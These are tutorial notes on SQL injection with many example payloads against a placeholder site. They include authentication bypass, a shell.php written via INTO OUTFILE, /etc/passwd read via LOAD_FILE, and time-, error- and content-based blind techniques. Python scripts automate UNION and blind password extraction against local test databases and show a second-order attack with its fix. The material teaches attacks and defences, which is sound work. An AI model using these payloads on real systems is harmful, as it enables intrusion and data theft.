SQL Injection Attacks and Defense Analysis
(Partial notes.)
What is SQL injection?
As a simple example, suppose a shopping website lets users search for products cheaper than a given price.
The user enters this value, for example 100.00.
If instead the user enters 100.00' OR '1' = '1
the resulting SQL statement is

SELECT * FROM ProductsTbl WHERE Price < '100.00' OR '1' = '1' ORDER BY ProductDescription;

Because '1' = '1' is always true, the query returns every product in the table.
Let's look at another example,
For user authentication, the user enters a username and a password.
If the user appends injection code to the password, the statement becomes

SELECT userid FROM CMSUsers WHERE user = 'foo' AND password = 'password' OR '1' = '1';

Since AND binds tighter than OR, the WHERE clause reads (user = 'foo' AND password = 'password') OR '1' = '1', which is true for every row, so the authentication check is bypassed.
Inline SQL Injection
In an inline injection the injected SQL becomes part of the original query, and the whole original query, injected code included, is still executed.
Inline string injection
Example:
The following statement, built from the injected password old_password' OR '1'='1, updates the password of every row in the users table to new_password, which is very serious.

UPDATE users SET password = 'new_password' WHERE username = 'Bob' AND password = 'old_password' OR '1'='1'

Inline numeric injection
Note that when injecting into a numeric parameter there is no need for single quotes around the injected value, because the original value is not quoted in the query.

SELECT * FROM messages WHERE uid = 45 OR 1 = 1 /* always-true condition */ ORDER BY sort_field;

Because the always-true condition (OR 1 = 1) is injected, the database returns all rows in the messages table, not just the rows sent to one user.
Terminated SQL Injection
In a terminated injection the attacker's code ends the original query, and the remainder of the original statement is neutralised by commenting it out.
Example:
Inject the string ' or 1=1; -- into the username:

SELECT * FROM administrators WHERE username = '' or 1=1;-- ' AND password = '';

Because 1 = 1 is always true, this statement returns every row in the administrators table.
In some scenarios the double-hyphen (--) comment cannot be used. Multi-line comments (/* */) can then be used instead, opened in one parameter and closed in another, so that the original SQL between them is commented out:

SELECT * FROM administrators WHERE username = 'admin'/*' AND password = '*/'';

This technique requires that more than one vulnerable parameter exists, and you need to know where those parameters appear in the SQL statement.
Executing multiple statements
SQL Server 6.0 introduced server cursors in its architecture, allowing strings that contain several statements to be executed on the same connection handle.
All SQL Server versions after 6.0 support this and allow statements such as the following to be executed:

SELECT foo FROM bar; SELECT foo2 FROM bar2;

MySQL also added this in version 4.1 and later, but it is not enabled by default: the client must request multi-statement support when it connects.
To use this technique you must terminate the first statement; arbitrary SQL can then be appended after it.
Example:

http://www.victim.com/search.php?s=test';SELECT '' INTO OUTFILE '/var/www/victim.com/shell.php';--
Time Delay
Time delay is a powerful technique. Even when the web server hides errors and data, it still has to wait for the database to return a result, so a delay can be used to confirm that SQL injection exists. The technique is especially suited to blind injection.
Microsoft SQL Server has a built-in command for introducing a delay into a query: WAITFOR DELAY 'hours:minutes:seconds'. For example, if the following request is sent to the victim's web server, the response takes 5 seconds:

http://www.victim.com/basket.aspx?uid=45;waitfor delay '0:0:5';--

The delay in the server's response confirms that we are injecting SQL code into the backend database.
MySQL has no command equivalent to WAITFOR DELAY, but a function that takes a long time to evaluate can be used to introduce a delay. The BENCHMARK function is a good choice:

mysql> SELECT BENCHMARK(10000000, ENCODE('hello', 'ms'));

(MySQL 5.0.12 and later also provide SLEEP(seconds), which gives a predictable delay, whereas the delay from BENCHMARK depends on the server's CPU speed.)
Injection attack methods
First determine which database is at the backend. The exact approach depends on whether the injection is blind, that is, whether the web server returns errors or query results to you.
The basic method is to use syntax that differs between databases and see which variant the application accepts.
String concatenation, for example, is written differently on each database: SQL Server uses 'a' + 'b', MySQL uses CONCAT('a', 'b'), and Oracle and PostgreSQL use 'a' || 'b'. Whichever form works without error identifies the backend.
Extracting data through UNION statements
UNION lets you append your own SELECT to the original query and retrieve additional information.

SELECT column-1, column-2, ..., column-N FROM table-1
UNION
SELECT column-1, column-2, ..., column-N FROM table-2

The limitations of this method are:
• The two queries must return exactly the same number of columns.
• The data in corresponding columns of the two SELECT statements must be of the same (or at least compatible) types.
How can you make your SELECT match the number and types of columns of the original query?
Try column counts one by one:

http://www.victim.com/products.asp?id=12+union+select+null--
http://www.victim.com/products.asp?id=12+union+select+null,null--
http://www.victim.com/products.asp?id=12+union+select+null,null,null--

Continue until no error is reported.
For the column types, substitute a value of the type you want into one NULL position at a time:

http://www.victim.com/products.asp?id=12+union+select+'test',NULL,NULL,NULL
http://www.victim.com/products.asp?id=12+union+select+NULL,'test',NULL,NULL

If no error is reported, that column accepts values of that type.
Example:
The following URL retrieves both the name of the current user and the name of the current database:

http://www.victim.com/products.asp?id=12+union+select+NULL,system_user,db_name(),NULL
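The three steps above (find the column count, find a column that accepts strings, then place an expression in that column) automated against a local database, as an added example rather than code from the page. It assumes sqlite3 in place of SQL Server, a constructed products table standing in for the shop, a constructed users table holding the data to extract, and a products() function playing the role of the products.asp?id= endpoint that surfaces database errors.

```python
import sqlite3

# Added example, not the page's code. The database and tables are constructed.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price REAL);
        INSERT INTO products VALUES (12, 'widget', 9.5), (13, 'gadget', 19.0);
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 's3cret');
    """)
    return conn

def products(conn, product_id: str) -> list:
    # Vulnerable endpoint: the id parameter is concatenated into the query and
    # database errors propagate, as a verbose error page would show them.
    return conn.execute("SELECT name, price FROM products WHERE id = " + product_id).fetchall()

def find_column_count(conn, max_cols: int = 20):
    # Step 1: append UNION SELECT NULL, NULL, ... until the error goes away.
    for n in range(1, max_cols + 1):
        payload = "12 UNION SELECT " + ", ".join(["NULL"] * n) + "--"
        try:
            products(conn, payload)
            return n            # same number of columns as the original query
        except sqlite3.Error:
            continue            # column-count mismatch: add another NULL
    return None

def string_columns(conn, ncols: int) -> list:
    # Step 2: put a string in each NULL slot in turn; slots that accept it
    # without error can carry extracted text.
    usable = []
    for slot in range(ncols):
        cols = ["NULL"] * ncols
        cols[slot] = "'test'"
        try:
            products(conn, "12 UNION SELECT " + ", ".join(cols) + "--")
            usable.append(slot)
        except sqlite3.Error:
            pass
    return usable

def extract(conn, ncols: int, expression: str, slot: int = 0) -> list:
    # Step 3: put the expression in a usable slot; the rows that were not in
    # the normal response carry the extracted values.
    baseline = set(products(conn, "12"))
    cols = ["NULL"] * ncols
    cols[slot] = expression
    rows = products(conn, "12 UNION SELECT " + ", ".join(cols) + "--")
    return sorted(row[slot] for row in set(rows) - baseline)

if __name__ == "__main__":
    db = make_db()
    n = find_column_count(db)
    print("columns:", n, "string slots:", string_columns(db, n))
    print(extract(db, n, "(SELECT password FROM users WHERE username = 'admin')"))
```

One caveat: SQLite is dynamically typed, so the 'test' probe succeeds in every slot here. On SQL Server a string placed in an integer column raises a conversion error, which is exactly the signal the type-probing step relies on.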
Using conditional statements
The conditional syntax differs between databases.
Approach 1: Time-Based
On SQL Server, for instance, one of the first things you might want to know is whether the user running the queries is the system administrator account, sa:

http://www.victim.com/products.asp?id=12;if+(system_user='sa')+WAITFOR+DELAY+'0:0:5'--

If the response is delayed by 5 seconds, the condition is true.
Approach 2: Error-Based

http://www.victim.com/products.asp?id=12/is_srvrolemember('sysadmin')

If is_srvrolemember('sysadmin') returns 1, the expression 12/1 still equals 12 and the page is returned normally. If it returns 0, 12/0 produces a divide-by-zero error. The function's value can therefore be inferred from whether an error appears.
As an example, here is how a CASE statement can be used to check, in our e-commerce application, whether the current user is sa:

http://www.victim.com/products.asp?id=12/(case+when+(system_user='sa')+then+1+else+0+end)

Approach 3: Content-Based
To avoid triggering errors, replace the division with an addition:

http://www.victim.com/products.asp?id=12%2B(case+when+(system_user+=+'sa')+then+1+else+0+end)

%2B is the URL encoding of +. If the condition is true the id becomes 13 and the page shows a different product; if it is false the id stays 12 and the page is unchanged. The answer is read from the page content rather than from an error.
Working with Strings

http://www.victim.com/search.asp?brand=acme

is equivalent to

http://www.victim.com/search.asp?brand=acm'%2B'e
or
http://www.victim.com/search.asp?brand=ac'%2B'm'%2B'e

because %2B decodes to +, which is SQL Server's string concatenation operator.
It is also equivalent to

http://www.victim.com/search.asp?brand=ac'%2Bchar(109)%2B'e

since char(109) is 'm'. A condition can be injected in the same way:

http://www.victim.com/search.asp?brand=ac'%2Bchar(108%2B(case+when+(system_user+=+'sa')+then+1+else+0+end))%2B'e

Depending on the condition, this is equivalent to

http://www.victim.com/search.asp?brand=acme

(char(109), the user is sa) or

http://www.victim.com/search.asp?brand=acle

(char(108), the user is not sa), and the two searches return different results.
The preceding attack obtains only 1 bit of data. It can be extended: first determine len(system_user) by binary search, using requests such as

http://www.victim.com/products.asp?id=10/(case+when+(len(system_user)+>+8)+then+1+else+0+end)

then use binary search again to find each character, comparing its ASCII value against a threshold (here the first character):

http://www.victim.com/products.asp?id=12/(case+when+(ascii(substring(system_user,1,1))+>+128)+then+1+else+0+end)

Each request halves the remaining range, so one character costs at most 8 requests.
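The binary-search extraction just described, carried through end to end against a local database, as an added example that is not code from the page. It assumes sqlite3 rather than SQL Server (so ascii(substring(...)) becomes unicode(substr(...)) and len() becomes length()), a constructed products table with ids 12 and 13, a constructed users table whose admin password is the value extracted blind, and a products() function standing in for products.asp?id=. The oracle is the content-based form from Approach 3, id=12+(CASE ...), chosen because SQLite returns NULL for 12/0 instead of raising the error that Approach 2 depends on.

```python
import sqlite3

# Added example, not the page's code. Database contents are constructed.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT);
        INSERT INTO products VALUES (12, 'widget'), (13, 'gadget');
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 's3cret');
    """)
    return conn

def products(conn, product_id: str) -> list:
    # Vulnerable endpoint: id is concatenated into the query.
    return conn.execute("SELECT name FROM products WHERE id = " + product_id).fetchall()

class BlindExtractor:
    """Content-based oracle: id=12+(CASE WHEN cond THEN 1 ELSE 0 END) shows
    product 13 when cond is true and product 12 when it is false."""

    def __init__(self, conn):
        self.conn = conn
        self.queries = 0

    def ask(self, condition: str) -> bool:
        self.queries += 1
        rows = products(self.conn, "12+(CASE WHEN (" + condition + ") THEN 1 ELSE 0 END)")
        return rows == [("gadget",)]

    def find_length(self, expr: str, max_len: int = 64) -> int:
        # Binary search for the smallest n with length(expr) <= n.
        lo, hi = 0, max_len
        while lo < hi:
            mid = (lo + hi) // 2
            if self.ask("length(" + expr + ") > " + str(mid)):
                lo = mid + 1
            else:
                hi = mid
        return lo

    def find_char(self, expr: str, pos: int) -> str:
        # Binary search over code points 0..255 for the character at pos (1-based);
        # each comparison is one request, so at most 8 per character.
        lo, hi = 0, 255
        while lo < hi:
            mid = (lo + hi) // 2
            if self.ask("unicode(substr(" + expr + ", " + str(pos) + ", 1)) > " + str(mid)):
                lo = mid + 1
            else:
                hi = mid
        return chr(lo)

    def extract(self, expr: str) -> str:
        n = self.find_length(expr)
        return "".join(self.find_char(expr, i) for i in range(1, n + 1))

def demo() -> tuple:
    """Extract the admin password one bit at a time; return it and the request count."""
    ex = BlindExtractor(make_db())
    secret = ex.extract("(SELECT password FROM users WHERE username = 'admin')")
    return secret, ex.queries

if __name__ == "__main__":
    print(demo())
```

The request count returned by demo() is the practical cost of the technique: six requests for the length plus eight per character, which is why blind extraction is usually automated rather than done by hand.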
Exploiting the operating system
Accessing the file system
Read:
MySQL's LOAD_FILE function also handles binary files transparently, which means that with a little finesse we can use it to read binary files from the remote host:

' UNION SELECT LOAD_FILE('/etc/passwd')#
INSERT INTO foo SET line = LOAD_FILE('/tmp/temp.bin');

Write:

aaa' UNION SELECT NULL, 'sensepost 2008\n' INTO DUMPFILE '/tmp/sp.txt'#

Both directions require the FILE privilege on the MySQL account the application uses, and the server's secure_file_priv setting restricts the directories these functions may read from or write to.
Executing operating system commands
Exploiting second-order SQL injection
In the first request the attack string is only written to storage, for example a database table, without being interpreted as SQL.
A second request reads the stored string back and uses it to build another query; that is where the injection actually takes effect.
Finding Second-Order Vulnerabilities
Second-order SQL injection is harder to detect than first-order injection, because the payload is submitted in one request and executed during the application's handling of a different request.
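A second-order injection across two requests, as an added example rather than code from the page. It assumes sqlite3, a constructed users table, and two hypothetical handlers: register(), which stores the username correctly with a bound parameter, and change_password_vulnerable(), which later reads that stored username back and concatenates it into an UPDATE. The first request is clean, which is why a scanner testing one request at a time sees nothing.

```python
import sqlite3

# Added example, not the page's code. The table and both handlers are constructed.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT UNIQUE, password TEXT);
        INSERT INTO users(username, password) VALUES ('admin', 's3cret');
    """)
    return conn

def register(conn, username: str, password: str) -> int:
    # First request: parameterized, so the crafted username is stored as plain
    # data and nothing goes wrong yet.
    cur = conn.execute("INSERT INTO users(username, password) VALUES (?, ?)", (username, password))
    return cur.lastrowid          # becomes the user's session id

def change_password_vulnerable(conn, user_id: int, new_password: str) -> None:
    # Second request: the username is read back from the database, treated as
    # trusted, and concatenated into a new query. The stored payload fires here.
    (username,) = conn.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchone()
    sql = "UPDATE users SET password = ? WHERE username = '" + username + "'"
    conn.execute(sql, (new_password,))

def change_password_safe(conn, user_id: int, new_password: str) -> None:
    # Bind every value whatever its origin: data read from the database is still data.
    conn.execute("UPDATE users SET password = ? WHERE id = ?", (new_password, user_id))

def password_of(conn, username: str) -> str:
    return conn.execute("SELECT password FROM users WHERE username = ?", (username,)).fetchone()[0]

def demo(safe: bool) -> str:
    """Register as admin'-- and then change 'our own' password; return admin's password."""
    conn = make_db()
    attacker_id = register(conn, "admin'--", "x")
    if safe:
        change_password_safe(conn, attacker_id, "owned")
    else:
        # Builds: UPDATE users SET password = ? WHERE username = 'admin'--'
        change_password_vulnerable(conn, attacker_id, "owned")
    return password_of(conn, "admin")

if __name__ == "__main__":
    print("vulnerable:", demo(safe=False), "safe:", demo(safe=True))
```

The fix is not to sanitise at the point of storage but to bind parameters at every query, including queries built from values the application previously stored itself.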